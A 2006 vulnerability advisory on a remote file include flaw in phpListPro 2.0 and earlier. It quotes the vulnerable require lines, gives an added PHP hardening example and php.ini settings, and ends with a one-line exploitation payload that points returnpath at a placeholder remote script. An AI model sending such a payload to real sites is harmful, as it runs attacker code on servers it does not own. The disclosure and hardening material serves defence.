phpListPro <= 2.0 - Remote File Include Vulnerability

2006-04-12T00:00:00
ID SECURITYVULNS:DOC:12178
Type securityvulns
Reporter Securityvulns
Modified 2006-04-12T00:00:00

Description

Software: phpListPro
Version: <=2.00
Type: Remote File Include Vulnerability
Date: April, 11th 2006
Vendor: SmartISoft
Page: http://smartisoft.com
Risk: High

Credits:

'Aesthetico' http://www.majorsecurity.de

Description:

PHP/mySQL rating TopList professional.

Vulnerability:

config.php is vulnerable at the following lines, where the path prefix $returnpath is used in require without validation:

142: require ($returnpath."lang_".$default_language.".php");
143: require ($returnpath."library.php");

Solution:

There isn't a solution yet.
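
One way to harden lines 142-143 of config.php in the meantime, as an added example that is not part of the advisory and not a vendor patch. It assumes the language files and library.php sit in the same directory as config.php; the language allowlist and the helper names resolve_include() and language_file() are hypothetical.

```php
<?php
// Added example: replacement for config.php lines 142-143.
// Assumption: lang_<name>.php and library.php live beside config.php.
// $returnpath is deliberately not used: it can be set from request data.

// Hypothetical allowlist; list the language files actually installed.
const ALLOWED_LANGUAGES = ['english', 'german'];

// Map a requested language to a file name, falling back to the first
// allowed entry for anything unexpected (unknown names, arrays, null).
function language_file($lang): string
{
    if (!in_array($lang, ALLOWED_LANGUAGES, true)) {
        $lang = ALLOWED_LANGUAGES[0];
    }
    return 'lang_' . $lang . '.php';
}

// Resolve $file under $baseDir and refuse anything that is not an
// existing local file inside that directory. realpath() returns false
// for URLs and missing files, and collapses "../" sequences.
function resolve_include(string $baseDir, string $file): string
{
    $base = realpath($baseDir);
    $full = realpath($baseDir . DIRECTORY_SEPARATOR . $file);
    if ($base === false || $full === false
        || strncmp($full, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        throw new RuntimeException('Refusing to include: ' . $file);
    }
    return $full;
}

// The include base is the directory of this file, never a request value.
require resolve_include(__DIR__, language_file($default_language ?? null));
require resolve_include(__DIR__, 'library.php');
```

Independently of the code change, setting register_globals = Off, allow_url_include = Off and allow_url_fopen = Off in php.ini (where the PHP version supports these directives) keeps request parameters out of script variables and stops require from fetching URLs.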

Exploitation:

Post data: returnpath=http://www.yourspace.com/yourscript.php?